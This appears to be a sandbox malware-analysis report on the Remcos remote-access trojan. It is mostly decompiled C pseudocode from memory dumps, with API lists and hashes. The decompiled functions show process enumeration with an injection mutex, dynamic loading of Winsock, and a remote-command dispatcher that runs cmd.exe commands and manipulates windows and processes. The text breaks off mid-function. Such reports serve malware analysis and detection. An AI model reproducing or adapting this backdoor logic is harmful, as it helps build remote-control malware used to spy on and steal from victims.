                                                                                                0x00440a3b
                                                                                                0x00440a3c
                                                                                                0x00440a3c
                                                                                                0x00440a43
                                                                                                0x00440a46
                                                                                                0x00440a49
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00440a49
                                                                                                0x00000000
                                                                                                0x00440a28
                                                                                                0x00440a1e
                                                                                                0x00440955
                                                                                                0x004408de
                                                                                                0x004408e3
                                                                                                0x004408e8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2509303402-0
                                                                                                • Opcode ID: 109d58eb255c04e5817e0c087173d14677fbceec56e6c27230619c0e004eef4c
                                                                                                • Instruction ID: b9f94e09276150385d08ac38733416d409a918e356910f264f6a8d6928ae5958
                                                                                                • Opcode Fuzzy Hash: 109d58eb255c04e5817e0c087173d14677fbceec56e6c27230619c0e004eef4c
                                                                                                • Instruction Fuzzy Hash: FFB1B171900345AFEB10DFA5C841BEEB7F4FF08304F14406EF995A7352DA79A8519B68
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040CE8E, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 186processsynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E0040CE8E(void* __eflags, char _a4) {
				void* _v8;
				char _v32;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v96;
				char _v120;
				char _v648;
				intOrPtr _v676;
				void* _v684;
				short _v1204;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t76;
				struct _SECURITY_ATTRIBUTES* _t106;
				char* _t111;
				void* _t158;
				void* _t161;

				_t106 = 0;
				GetModuleFileNameW(0,  &_v1204, 0x104);
				_t149 = "1";
				if(E00407795("1") != 0) {
					L14:
					E00401EEC( &_a4, _t149, _t159, E0041780B(_t106,  &_v120, _t149));
					_t111 =  &_v120;
					E00401EE2();
					if(E00418004(_t111) != 0) {
						_push(_t111);
						if(E0040D4F9( &_a4, L"Program Files\\") != 0xffffffff) {
							E0040D51A(_t106,  &_a4, _t157, _t73, 0xe, L"Program Files (x86)\\");
						}
					}
					if(E0040EB2F( &_v1204,  &_a4) != 0) {
						L22:
						E00401EE2();
						return _t106;
					} else {
						L18:
						_t158 = CreateMutexA(_t106, 1, "Remcos_Mutex_Inj");
						E004020C7(_t106,  &_v96);
						E004183CC(E00401EDD(0x46e590),  &_v96);
						E00401F87( &_v96);
						if(E00414D29(E00401EDD( &_a4)) == 0) {
							CloseHandle(_t158);
						} else {
							_t106 = 1;
							E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "Inj", 1);
						}
						E00401FB9();
						goto L22;
					}
				}
				E00401F5F(0,  &_v32);
				_t76 = CreateToolhelp32Snapshot(2, 0);
				_v8 = _t76;
				_v684 = 0x22c;
				Process32FirstW(_t76,  &_v684);
				while(Process32NextW(_v8,  &_v684) != 0) {
					E00404260(_t106,  &_v56,  &_v648);
					_t157 = E004022FC( &_v56,  &_v60);
					_t159 = E004022BF( &_v56,  &_v64);
					E00408269( &_v72,  *((intOrPtr*)(E004022FC( &_v56,  &_v68))),  *_t84,  *_t82);
					_t161 = _t161 + 0xc;
					if(E00409EE1( &_a4) != 0) {
						E00401EEC( &_v32, _v676, _t159, E00418068( &_v120, _v676));
						E00401EE2();
						if(E00407795( &_v1204) == 0) {
							_t149 = 0x46079c;
							if(E00407795(0x46079c) != 0 || E00418032(_v676) != 0) {
								E00401EE2();
								L13:
								E00401EE2();
								goto L14;
							} else {
								E00409E8B( &_v32);
								E00401EE2();
								break;
							}
						}
						E00401EE2();
						E00401EE2();
						goto L22;
					}
					E00401EE2();
				}
				CloseHandle(_v8);
				_t149 = 0x46079c;
				if(E00407795(0x46079c) != 0) {
					goto L13;
				}
				E00401EE2();
				goto L18;
			}
























                                                                                                0x0040cea6
                                                                                                0x0040cea9
                                                                                                0x0040ceaf
                                                                                                0x0040cebe
                                                                                                0x0040d01f
                                                                                                0x0040d02b
                                                                                                0x0040d030
                                                                                                0x0040d033
                                                                                                0x0040d03f
                                                                                                0x0040d041
                                                                                                0x0040d052
                                                                                                0x0040d05f
                                                                                                0x0040d05f
                                                                                                0x0040d052
                                                                                                0x0040d074
                                                                                                0x0040d0ee
                                                                                                0x0040d0f1
                                                                                                0x0040d0fe
                                                                                                0x0040d076
                                                                                                0x0040d076
                                                                                                0x0040d087
                                                                                                0x0040d089
                                                                                                0x0040d09d
                                                                                                0x0040d0a5
                                                                                                0x0040d0bf
                                                                                                0x0040d0e0
                                                                                                0x0040d0c1
                                                                                                0x0040d0c8
                                                                                                0x0040d0d6
                                                                                                0x0040d0dc
                                                                                                0x0040d0e9
                                                                                                0x00000000
                                                                                                0x0040d0e9
                                                                                                0x0040d074
                                                                                                0x0040cec7
                                                                                                0x0040cecf
                                                                                                0x0040cedb
                                                                                                0x0040cee0
                                                                                                0x0040ceea
                                                                                                0x0040cf51
                                                                                                0x0040cefc
                                                                                                0x0040cf0d
                                                                                                0x0040cf1b
                                                                                                0x0040cf32
                                                                                                0x0040cf37
                                                                                                0x0040cf47
                                                                                                0x0040cfa2
                                                                                                0x0040cfaa
                                                                                                0x0040cfbf
                                                                                                0x0040cfd6
                                                                                                0x0040cfe5
                                                                                                0x0040d012
                                                                                                0x0040d01a
                                                                                                0x0040d01a
                                                                                                0x00000000
                                                                                                0x0040cff6
                                                                                                0x0040cffd
                                                                                                0x0040d005
                                                                                                0x00000000
                                                                                                0x0040d005
                                                                                                0x0040cfe5
                                                                                                0x0040cfc4
                                                                                                0x0040cfcc
                                                                                                0x00000000
                                                                                                0x0040cfcc
                                                                                                0x0040cf4c
                                                                                                0x0040cf4c
                                                                                                0x0040cf68
                                                                                                0x0040cf6e
                                                                                                0x0040cf80
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040cf86
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,hpg,00000000,00000001), ref: 0040CEA9
                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0040CECF
                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040CEEA
                                                                                                • Process32NextW.KERNEL32(0040C897,0000022C), ref: 0040CF5B
                                                                                                • CloseHandle.KERNEL32(0040C897,?,00000000,?,?,?), ref: 0040CF68
                                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj,00000000), ref: 0040D07E
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040D0E0
                                                                                                  • Part of subcall function 00418068: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041807D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess32$FileFirstModuleMutexNameNextOpenProcessSnapshotToolhelp32
                                                                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj$hpg
                                                                                                • API String ID: 193334293-407998168
                                                                                                • Opcode ID: f6eb4f883c040c9c4d4ce09dff5f784f1b06908c0e32a02ed7585b0163100156
                                                                                                • Instruction ID: 0f7dcfa6b6154c6ef28bc8d9e985d7e6bba570805e57f3f35b7f7f9768b09353
                                                                                                • Opcode Fuzzy Hash: f6eb4f883c040c9c4d4ce09dff5f784f1b06908c0e32a02ed7585b0163100156
                                                                                                • Instruction Fuzzy Hash: 13614F309002099ACF14EBE1D8969EE7779AF5034CF20417FB506771E2EF786E4ACA59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0041212A, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E0041212A() {
				intOrPtr _v8;
				CHAR* _v12;
				intOrPtr _v16;
				CHAR* _v20;
				intOrPtr _v24;
				CHAR* _v28;
				char _v296;
				char _v560;
				intOrPtr _t25;
				_Unknown_base(*)()* _t43;
				signed int _t53;
				struct HINSTANCE__* _t55;
				struct HINSTANCE__* _t58;
				void* _t61;

				_v28 = "getaddrinfo";
				_v24 = E00411CE2;
				_v20 = "getnameinfo";
				_v16 = E00411F62;
				_v12 = "freeaddrinfo";
				_v8 = E00411CA4;
				if( *0x46fcf4 == 0) {
					if(GetSystemDirectoryA( &_v560, 0x104) != 0) {
						E0043CAAC( &_v296, 0x10c,  &_v560);
						E0043CB06( &_v296, 0x10c, "\\ws2_32");
						_t58 = LoadLibraryA( &_v296);
						_t55 = 0;
						if(_t58 == 0) {
							L6:
							E0043CAAC( &_v296, 0x10c,  &_v560);
							E0043CB06( &_v296, 0x10c, "\\wship6");
							_t58 = LoadLibraryA( &_v296);
							if(_t58 != 0) {
								if(GetProcAddress(_t58, "getaddrinfo") == 0) {
									FreeLibrary(_t58);
									_t58 = _t55;
								}
								if(_t58 != 0) {
									goto L10;
								}
							}
						} else {
							if(GetProcAddress(_t58, "getaddrinfo") == 0) {
								FreeLibrary(_t58);
								_t58 = 0;
							}
							if(_t58 != 0) {
								L10:
								_t53 = _t55;
								while(1) {
									_t43 = GetProcAddress(_t58,  *(_t61 + _t53 * 8 - 0x18));
									 *(_t61 + _t53 * 8 - 0x14) = _t43;
									if(_t43 == 0) {
										break;
									}
									_t53 = _t53 + 1;
									if(_t53 < 3) {
										continue;
									} else {
									}
									L15:
									if(_t58 != 0) {
										do {
											 *((intOrPtr*)(_t55 + 0x46c9ec)) =  *((intOrPtr*)(_t61 + _t55 - 0x14));
											_t55 = _t55 + 8;
										} while (_t55 < 0x18);
									}
									goto L17;
								}
								FreeLibrary(_t58);
								_t58 = _t55;
								goto L15;
							} else {
								goto L6;
							}
						}
						L17:
					}
					 *0x46fcf4 = 1;
				}
				_t25 =  *0x46c9ec; // 0x411ce2
				return _t25;
			}

















                                                                                                0x0041213a
                                                                                                0x00412141
                                                                                                0x00412148
                                                                                                0x0041214f
                                                                                                0x00412156
                                                                                                0x0041215d
                                                                                                0x00412164
                                                                                                0x0041217e
                                                                                                0x0041219b
                                                                                                0x004121ad
                                                                                                0x004121c8
                                                                                                0x004121ca
                                                                                                0x004121ce
                                                                                                0x004121e9
                                                                                                0x004121fd
                                                                                                0x0041220f
                                                                                                0x00412224
                                                                                                0x00412228
                                                                                                0x00412238
                                                                                                0x0041223b
                                                                                                0x0041223d
                                                                                                0x0041223d
                                                                                                0x00412241
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412241
                                                                                                0x004121d0
                                                                                                0x004121de
                                                                                                0x004121e1
                                                                                                0x004121e3
                                                                                                0x004121e3
                                                                                                0x004121e7
                                                                                                0x00412243
                                                                                                0x00412243
                                                                                                0x00412245
                                                                                                0x0041224a
                                                                                                0x00412250
                                                                                                0x00412256
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00412258
                                                                                                0x0041225c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0041225e
                                                                                                0x00412269
                                                                                                0x0041226b
                                                                                                0x0041226d
                                                                                                0x00412271
                                                                                                0x00412277
                                                                                                0x0041227a
                                                                                                0x0041226d
                                                                                                0x00000000
                                                                                                0x0041226b
                                                                                                0x00412261
                                                                                                0x00412267
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004121e7
                                                                                                0x0041227f
                                                                                                0x00412281
                                                                                                0x00412282
                                                                                                0x00412282
                                                                                                0x0041228c
                                                                                                0x00412294

                                                                                                APIs
                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00412176
                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 004121BC
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004121D6
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00000000,00000000), ref: 004121E1
                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041221E
                                                                                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412230
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041223B
                                                                                                • GetProcAddress.KERNEL32(00000000,004668A0), ref: 0041224A
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00412261
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                • String ID: \ws2_32$\wship6$getaddrinfo
                                                                                                • API String ID: 2490988753-3078833738
                                                                                                • Opcode ID: 457d837b0b855f760349e9f5aa46f248d228e9f14f6977d881541a4667a72e94
                                                                                                • Instruction ID: 8ba9de9ea38a74fad0edb80c0d42514c3cf7ca3bba8c170231fc23d52f74bd2b
                                                                                                • Opcode Fuzzy Hash: 457d837b0b855f760349e9f5aa46f248d228e9f14f6977d881541a4667a72e94
                                                                                                • Instruction Fuzzy Hash: DF319A72D02229A7CB10EB60DD88EDF76ACAF48705F1101A3ED04E7251E778DA948BDD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00412DBE, Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 458COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E00412DBE(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a44) {
				char _v5;
				char _v140;
				char _v144;
				char _v164;
				char _v180;
				char _v188;
				void* _v196;
				char _v216;
				void* _v220;
				char _v236;
				char _v240;
				void* _v244;
				char _v264;
				void* _v268;
				char _v276;
				char _v288;
				void* _v292;
				void* _v308;
				char _v312;
				void* _v316;
				char _v328;
				char _v332;
				char _v336;
				char* _v344;
				char _v348;
				char _v368;
				char _v372;
				char _v376;
				char _v384;
				char _v392;
				long _v396;
				int _v400;
				char _v408;
				char _v420;
				char _v424;
				void* _v428;
				int _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v448;
				char _v452;
				char _v456;
				char _v460;
				char _v464;
				char _v468;
				char _v476;
				char _v524;
				char _v528;
				void* _t246;
				void* _t248;
				intOrPtr _t376;
				intOrPtr _t377;
				void* _t378;
				void* _t380;
				signed int _t381;
				signed int _t387;
				void* _t390;
				void* _t391;
				void* _t392;
				void* _t396;
				void* _t402;

				_t401 = __eflags;
				_t362 = __edx;
				_t296 = __ebx;
				_push(__ebx);
				_t376 = _a4;
				E004020DE(__ebx,  &_v332, __edx, __eflags, _t376 + 0xc);
				SetEvent( *(_t376 + 0x24));
				_t377 =  *((intOrPtr*)(E00401F87( &_v336)));
				E00404287( &_v336,  &_v312, 4, 0xffffffff);
				_t390 = (_t387 & 0xfffffff8) - 0x1a4;
				E004020DE(__ebx, _t390, _t362, _t401, 0x46e250);
				_t391 = _t390 - 0x18;
				E004020DE(__ebx, _t391, _t362, _t401,  &_v328);
				E00417E68( &_v468, _t362);
				_t392 = _t391 + 0x30;
				_t402 = _t377 - 0x8f;
				if(_t402 > 0) {
					_t378 = _t377 + 0xffffff70;
					__eflags = _t378 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t378 + 0x413f3e) & 0x000000ff) * 4 +  &M00413EF2))) {
							case 0:
								__ecx =  &_v444;
								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
								__eax = E00401F87(__ecx);
								__ecx = __eax;
								__eax = E00407FC3(__ecx);
								goto L127;
							case 1:
								__ecx =  &_v444;
								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
								__eax = E00401F87(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v448;
								__edi = __eax;
								__ecx = E00401E3B( &_v448, __edx, __eflags, 1);
								__eax = E00401F87(__eax);
								__dl = 0x30;
								__ecx =  &_v432;
								__eax = E00418A4B( &_v432, __edx, __eax);
								__ecx =  &_v432;
								__eax = E00401EDD( &_v432);
								__ecx =  &_v452;
								__esi = __eax;
								__eax = E00401E3B( &_v452, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E0041843E(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v440;
								__edx = E00401EDD( &_v440);
								__ecx = __edi;
								__eax = E00418900(__edi, __edx);
								goto L107;
							case 2:
								__ecx =  &_v444;
								__ecx = E00401E3B( &_v444, __edx, __eflags, 1);
								__eax = E00401F87(__eax);
								__ecx =  &_v448;
								__ecx = E00401E3B( &_v448, __edx, __eflags, 0);
								__eax = E00401F87(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v444;
								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413F72(__ebx, __edx);
								goto L104;
							case 4:
								__ecx =  &_v444;
								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00414091(__ecx, __edi, __eflags);
								goto L104;
							case 5:
								E004020DE(__ebx, _t392 - 0x18, _t362, __eflags, E00401E3B( &_v444, _t362, __eflags, 0));
								E00406AA1(_t296, _t362);
								goto L104;
							case 6:
								__ecx =  &_v444;
								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00415D7B(__ebx, __edx);
								goto L104;
							case 7:
								__ecx =  &_v444;
								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00404005(__ebx, __edx, __eflags);
								goto L104;
							case 8:
								__eax = E00417043(__ebx);
								goto L127;
							case 9:
								__eax = E00417171(__ebx, __eflags);
								goto L127;
							case 0xa:
								__eax = E004171B0(__eax);
								goto L127;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v444;
								__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
								__eax = E004052CF(0);
								__ecx =  &_v452;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = E00401E3B( &_v452, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E00417150(__ecx, __edx, __edi, __esi);
								goto L127;
							case 0xc:
								__eax = E004171B8(__edx);
								goto L127;
							case 0xd:
								__eax = E00406114(__ebx, __ecx, __edx);
								__ecx =  &_v444;
								__esi = __eax;
								__eax = E00401E3B( &_v444, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v372;
								__edi = __esp;
								__edx = __esi;
								__edx = E00417C16(__ebx,  &_v372, __esi);
								__ecx =  &_v396;
								__edx = __eax;
								__ecx = __edi;
								__eax = E00402F85(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L126;
							case 0xe:
								__eflags =  *0x46daf7;
								if( *0x46daf7 != 0) {
									ShowWindow( *0x46e0ac, 9) = SetForegroundWindow( *0x46e0ac);
								} else {
									__cl = 1;
									__eax = E004199B8(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0, E00419787, 0, 0, 0);
									 *0x46daf7 = 2;
								}
								goto L127;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v140;
								__eax = E00407456( &_v140);
								__ecx =  &_v444;
								__eax = E00401E3B( &_v444, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v452;
								__eax = E00401E3B( &_v452, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v460;
								__eax = E00401E3B( &_v460, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v164;
								__eax = E00405D7F(__ebx,  &_v164);
								__ecx =  &_v236;
								__eax = E00407464();
								goto L127;
							case 0x12:
								goto L127;
						}
					}
					goto L127;
				} else {
					if(_t402 == 0) {
						L134();
						_v348 = E004374E4(_t239, E00401F87(E00401E3B( &_v444, _t362, __eflags, 2)));
						_v344 =  &_v144;
						E004143C2(__ebx, _t362, 0x46e250, __eflags,  &_v348);
						_t123 = E0040809D() - 1; // -1
						_t380 = _t123;
						_t246 = E00401E3B( &_v452, _t362, __eflags, 3);
						_t396 = _t392 - 0x18;
						E004020DE(_t296, _t396, _t362, __eflags, _t246);
						_t248 = E00401E3B( &_v460, _t362, __eflags, 2);
						E004020DE(_t296, _t396 - 0x18, _t362, __eflags, _t248);
						E00404260(_t296, _t396, E00401F87(E00401E3B( &_v468, _t362, __eflags, 1)));
						E00404260(_t296, _t396 - 0xffffffffffffffe8, E00401F87(E00401E3B( &_v476, _t362, __eflags, 0)));
						E0040783D( &_v180, _t362, __eflags);
						__eflags = _v276;
						if(_v276 == 0) {
							E0040804A( &_v444,  *((intOrPtr*)(E00408029(E004080B1( &_v180,  &_v528),  &_v524, _t380))));
						}
						E0040801E();
						goto L127;
					} else {
						_t381 = _t377 - 1;
						if(_t381 > 0x33) {
							L127:
							E00401E66( &_v444, _t362);
							E00401FB9();
							E00401FB9();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t381 * 4 +  &M00413E22))) {
								case 0:
									_t265 = E00417C16(0,  &_v392, GetTickCount());
									_t267 = E00417C16(0,  &_v368, E00417BC6( &_v392));
									_t269 = E00417D8C(0,  &_v188, E00417B8C( &_v164));
									_t371 = E00402F85(0,  &_v428, E00402F0F( &_v288, E00402F85(0,  &_v264, E00402F0F( &_v240, E00402FA9( &_v216, E00401E3B( &_v444, _t268, _t403, 0), 0x46e250), _t269), _t403, 0x46e250), _t267), _t403, 0x46e250);
									E00402F0F(_t392 - 0x18, _t275, _t265);
									_push(0x4c);
									E00404BB7(0, 0x46e848, _t275, _t403);
									E00401FB9();
									E00401FB9();
									E00401FB9();
									E00401FB9();
									E00401FB9();
									E00401FB9();
									E00401EE2();
									E00401FB9();
									E00401FB9();
									_t289 = E004374E4(_t287, E00401F87(E00401E3B( &_v476, _t275, _t403, 1)));
									if(_t289 == 0) {
										E00401E3B( &_v464, _t371, __eflags, 0);
										_t362 = "0";
										_t291 = E00405C1B("0");
										__eflags = _t291;
										if(_t291 != 0) {
											_push(0);
											_t360 = 0x46e848;
											goto L10;
										}
									} else {
										_t362 = _t289 + _t289;
										if(E004047EB(0x46e848) == 0) {
											E00405038(0x46e848, _t362, 1);
										} else {
											E004050DB(0x46e250, _t362);
										}
									}
									goto L127;
								case 1:
									_push(0);
									__ecx = 0x46e848;
									L10:
									E004051C8(_t360, _t362);
									goto L127;
								case 2:
									__ecx =  &_v392;
									__eax = E004185F5(__ebx,  &_v392);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = E00417D8C(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46e848;
									__eax = E00404BB7(__ebx, 0x46e848, __edx, __eflags);
									__ecx =  &_v420;
									goto L108;
								case 3:
									goto L127;
								case 4:
									 &_v400 = GetCurrentProcessId();
									__eax = E0043CDA6(__ecx, __eax,  &_v400, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v400;
									__esi = __esp;
									__ecx =  &_v368;
									__edx = E0040D25B(__ebx,  &_v368, __eflags);
									__ecx =  &_v392;
									__edx = __eax;
									__ecx = __esi;
									__eax = E004076BB(__ebx, __esi, __edx, __edi, __eflags,  &_v400);
									_push(0x4f);
									goto L126;
								case 5:
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__ecx);
									__ecx = __eax;
									__eax = E00417BE9(__ecx);
									goto L127;
								case 6:
									L20:
									__eax = E00414318(__edx);
									goto L127;
								case 7:
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__ecx);
									__eax = CloseWindow(__eax);
									goto L127;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags);
									__eax = E00401F87(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L127;
								case 0xa:
									__eax =  &_v396;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v396);
									__ecx = _v400;
									__eax = E00417BE9(_v400);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									__eax = E00401F87(__eax);
									__ecx =  &_v372;
									__eax = E00404260(0,  &_v372, __eax);
									__edx = L"/C ";
									__ecx =  &_v400;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v400;
									__eax = E00401EE2();
									__ecx =  &_v376;
									goto L108;
								case 0xc:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 1);
									__ecx = 0x46e300;
									__eax = E00401F9F(0x46e300, __eax);
									__eflags =  *0x46dad7 - __bl; // 0x0
									if(__eflags == 0) {
										__ecx =  &_v444;
										__eax = E00401E3B( &_v444, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E004057A3();
										goto L104;
									}
									goto L127;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v444;
									__ecx = E00401E3B( &_v444, __edx, __eflags, 0);
									E00401F87(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L127;
								case 0xe:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__ecx = 0x46e960;
									__eax = E00401F9F(0x46e960, __eax);
									__ecx =  &_v452;
									__ecx = E00401E3B( &_v452, __edx, __eflags, 3);
									__eax = E00401F87(__ecx);
									__esi = __eax;
									__eax = E00414F1D(__edx, __edi, __eax);
									__ecx =  &_v456;
									__ecx = E00401E3B( &_v456, __edx, __eflags, 2);
									__eax = E00401F87(__ecx);
									__eax = E004374E4(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v460;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = E00401E3B( &_v460, __edx, _t57, 1);
									E00401F87(__ecx) = E004374E4(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = E00414F9A(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46dd5e = 1;
									__eax = __eax + 0x46dd5e;
									__ecx = __ecx + __ebp;
									__eflags = __ecx;
									return 0x8f;
									__eax = __eax |  *__eax;
									 *__edx =  *__edx + __ch;
									__eflags =  *__edx;
									goto L127;
								case 0x10:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020DE(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46e3b0;
									__eax = E004085C0(0x46e3b0, __edx);
									goto L127;
								case 0x11:
									__ecx = 0x46e3b0;
									__eax = E004093D2(0x46e3b0);
									goto L127;
								case 0x12:
									__ecx = 0x46e3b0;
									__eax = E00409535(__ebx, 0x46e3b0);
									goto L127;
								case 0x13:
									__ecx =  &_v444;
									__eax = E00401E3B( &_v444, __edx, __eflags, 0);
									__ecx = 0x46e440;
									__eax = E00401F9F(0x46e440, __eax);
									__ecx = 0x46e3b0;
									goto L34;
								case 0x14:
									 *0x46dd60 =  *0x46dd60 + 1;
									__eflags =  *0x46dd60;
									__eflags = __eax;
									__ecx =  &_v444;
